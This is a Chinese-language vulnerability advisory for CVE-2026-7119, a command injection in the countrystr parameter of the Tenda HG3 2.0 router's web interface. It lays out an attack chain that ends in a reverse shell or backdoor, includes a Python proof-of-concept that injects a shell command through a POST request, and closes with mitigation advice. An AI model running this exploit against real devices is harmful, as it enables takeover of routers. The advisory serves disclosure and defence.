CVE-2026-7119 Tenda HG3操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-7119

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda HG3

漏洞概述

Tenda HG3 2.0路由器被发现存在严重的安全漏洞。问题出在/boaform/formCountrystr接口处理countrystr参数时未对用户输入进行严格过滤，导致操作系统命令注入。由于该漏洞允许远程攻击且无需用户交互，攻击者可利用此漏洞在目标设备上执行任意系统命令，造成数据窃取、系统破坏等严重后果。鉴于相关利用代码已公开，建议用户尽快采取防护措施。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection），影响Tenda HG3 2.0固件。漏洞位于Web管理界面的/boaform/formCountrystr处理逻辑中。当设备接收设置国家字符串的请求时，后端CGI程序直接提取HTTP POST参数中的countrystr值，并将其拼接到系统命令中调用函数执行。由于缺乏对特殊字符（如分号、管道符、反引号等）的过滤机制，攻击者可以截断原有命令结构并注入任意操作系统指令。虽然利用该漏洞需要低权限账号（PR:L），但攻击无需用户交互（UI:N）。一旦攻击成功，远程攻击者即可获得Root或同等权限，读取敏感配置、修改系统文件甚至导致设备拒绝服务，对机密性、完整性和可用性造成全面影响。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别目标设备为Tenda HG3 2.0，并确认其Web管理界面的开放端口。

STEP 2

获取认证

根据CVSS向量PR:L，攻击者获取低权限账号的登录凭证（如弱口令爆破或默认凭证），访问管理界面。

STEP 3

构造恶意请求

攻击者针对/boaform/formCountrystr端点，构造包含操作系统命令注入载荷的HTTP POST请求，在countrystr参数中注入恶意Shell命令。

STEP 4

执行命令

服务器端后端程序处理请求时，直接将恶意参数拼接到系统命令中执行，导致攻击者注入的命令在设备上运行。

STEP 5

建立控制

攻击者利用执行的命令反弹Shell或写入后门文件，从而完全控制受影响的路由器设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_tenda_hg3(target_ip):
    """
    PoC for CVE-2026-7119 - OS Command Injection in Tenda HG3 2.0
    Vulnerable endpoint: /boaform/formCountrystr
    Vulnerable parameter: countrystr
    """
    url = f"http://{target_ip}/boaform/formCountrystr"
    
    # The payload injects a shell command to echo a specific string
    # Example payload: ; echo pwned > /tmp/poc.txt
    malicious_payload = "; echo CVE-2026-7119 > /tmp/poc_check"
    
    # Data payload mimicking the form submission
    post_data = {
        "countrystr": malicious_payload
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; PoC-Scanner/1.0)"
    }

    try:
        # Sending the exploit request
        # Note: PR:L implies authentication might be needed, 
        # so valid cookies/headers should be added if required.
        response = requests.post(url, data=post_data, headers=headers, timeout=5)
        
        if response.status_code == 200:
            return f"[+] Payload sent to {target_ip}. Check /tmp/poc_check on device."
        else:
            return f"[-] Request failed with status code: {response.status_code}"
            
    except requests.RequestException as e:
        return f"[-] Connection error: {e}"

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    print(exploit_tenda_hg3(target))

影响范围

Tenda HG3 2.0

防御指南

临时缓解措施

如果无法立即升级，建议禁用路由器的远程Web管理功能，并将管理后台仅限制在受信任的内网IP地址访问。同时，修改默认的管理员密码以增加攻击难度。部署网络入侵检测系统（NIDS）监控针对/boaform/formCountrystr路径的异常请求流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7119
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7119
3 Details https://www.cvedetails.com/cve/CVE-2026-7119/
4 VulDB https://vuldb.com/cve/CVE-2026-7119
5 Link https://vuldb.com/submit/800859
6 Link https://vuldb.com/vuln/359719
7 Link https://vuldb.com/vuln/359719/cti
8 Link https://www.notion.so/Tenda-HG3-1-33d0c75766a8808d8b38e9d090cec7ab
9 Link https://www.tenda.com.cn/